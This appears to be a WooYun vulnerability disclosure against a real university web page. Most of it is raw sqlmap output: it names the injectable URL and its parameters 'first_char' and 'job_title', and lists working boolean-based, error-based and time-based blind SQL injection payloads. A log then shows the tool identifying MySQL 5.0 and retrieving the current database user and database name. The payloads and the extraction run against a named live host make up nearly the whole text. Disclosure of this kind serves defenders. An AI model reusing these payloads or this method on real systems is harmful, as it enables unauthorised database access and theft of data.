WooYun.org

注入点 http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=W&first_char=L&job_title=2
参数1:first_char
参数2:job_title

Parameter: first_char (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: first_char=W&first_char=L' AND 5694=5694 AND 'AvDK'='AvDK&job_title=2
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: first_char=W&first_char=L' AND (SELECT 4453 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(4453=4453,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'epXZ'='epXZ&job_title=2
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: first_char=W&first_char=L' AND (SELECT * FROM (SELECT(SLEEP(5)))dkdz) AND 'EeHe'='EeHe&job_title=2
Parameter: job_title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: first_char=W&first_char=L&job_title=2 AND 1165=1165
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: first_char=W&first_char=L&job_title=2 AND (SELECT 6652 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(6652=6652,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: first_char=W&first_char=L&job_title=2 AND (SELECT * FROM (SELECT(SLEEP(5)))lvuL)
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: first_char, type: Single quoted string (default)
[1] place: GET, parameter: job_title, type: Unescaped numeric
[q] Quit
> 0
[16:00:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9
back-end DBMS: MySQL 5.0
[16:00:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 346 times
[16:00:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/mba.bus.sysu.edu.cn'
[*] shutting down at 16:00:48

[16:07:04] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9
back-end DBMS: MySQL 5.0
[16:07:04] [INFO] fetching current user
[16:07:04] [WARNING] reflective value(s) found and filtering out
[16:07:04] [INFO] retrieved: zsgy@localhost
current user:    'zsgy@localhost'
[16:07:04] [INFO] fetching current database
[16:07:04] [INFO] retrieved: zsbm
current database:    'zsbm'